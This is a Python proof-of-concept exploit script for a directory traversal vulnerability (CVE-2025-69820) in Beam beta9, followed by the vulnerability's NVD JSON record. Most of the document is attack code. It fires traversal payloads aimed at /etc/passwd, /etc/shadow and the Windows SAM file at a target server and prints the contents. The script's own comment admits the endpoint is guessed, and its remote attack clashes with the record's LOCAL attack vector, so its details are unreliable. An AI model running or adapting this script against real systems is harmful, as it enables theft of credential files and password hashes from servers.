CVE-2025-69820

# CVE-2025-69820 PoC - Directory Traversal in Beam beta9 # Target: Beam beta9 v.0.1.521 # Vulnerability: joinCleanPath function in pkg/abstractions/volume/multipart.go import requests import urllib.parse TARGET_URL = "http://target-beam-server:8080" def exploit_directory_traversal(): """ Exploit the directory traversal vulnerability in Beam beta9 to read sensitive files from the server """ # Path traversal payloads to read sensitive files payloads = [ "../../../../etc/passwd", "../../../../etc/shadow", "../../../etc/hosts", "../../../../../../../../../etc/passwd", "..\..\..\..\windows\system32\config\sam" # Windows target ] for payload in payloads: # Try to access file through the vulnerable endpoint # The exact endpoint depends on the vulnerable function usage endpoint = f"{TARGET_URL}/api/v1/volume/read" params = { "path": payload, "clean": "true" # Trigger joinCleanPath function } try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success with payload: {payload}") print(f"[+] Content:\n{response.text[:500]}") elif response.status_code == 403: print(f"[-] Access denied with payload: {payload}") else: print(f"[*] Status {response.status_code} with payload: {payload}") except requests.exceptions.RequestException as e: print(f"[!] Error with payload {payload}: {e}") def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-69820 """ # Test with a benign file to verify path traversal works test_path = "../../../../etc/hostname" endpoint = f"{TARGET_URL}/api/v1/volume/read" params = { "path": test_path, "clean": "true" } response = requests.get(endpoint, params=params) if response.status_code == 200: print("[!] Target appears to be VULNERABLE to CVE-2025-69820") return True else: print("[-] Target does not appear to be vulnerable") return False if __name__ == "__main__": print("CVE-2025-69820 - Beam beta9 Directory Traversal PoC") print("=" * 60) check_vulnerability() print("\n[*] Attempting exploitation...") exploit_directory_traversal()

{"cve": {"id": "CVE-2025-69820", "sourceIdentifier": "[email protected]", "published": "2026-01-22T16:16:07.820", "lastModified": "2026-02-02T20:33:56.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory Traversal vulnerability in Beam beta9 v.0.1.521 allows a remote attacker to obtain sensitive information via the joinCleanPath function."}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en Beam beta9 v.0.1.521 permite a un atacante remoto obtener información sensible a través de la función joinCleanPath."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:beam:beta9:0.1.521:*:*:*:*:*:*:*", "matchCriteriaId": "9A92A6DC-4A4D-4A2A-A818-1F11BDB7A89F"}]}]}], "references": [{"url": "https://github.com/aws/aws-sdk-php/security/advisories/GHSA-557v-xcg6-rm5m", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/beam-cloud/beta9/blob/c1cd75e813cf7d53e916157d920099e89ef45caa/pkg/abstractions/volume/multipart.go#L45", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ryotaromatsui/CVEs/tree/main/CVE-2025-69820", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}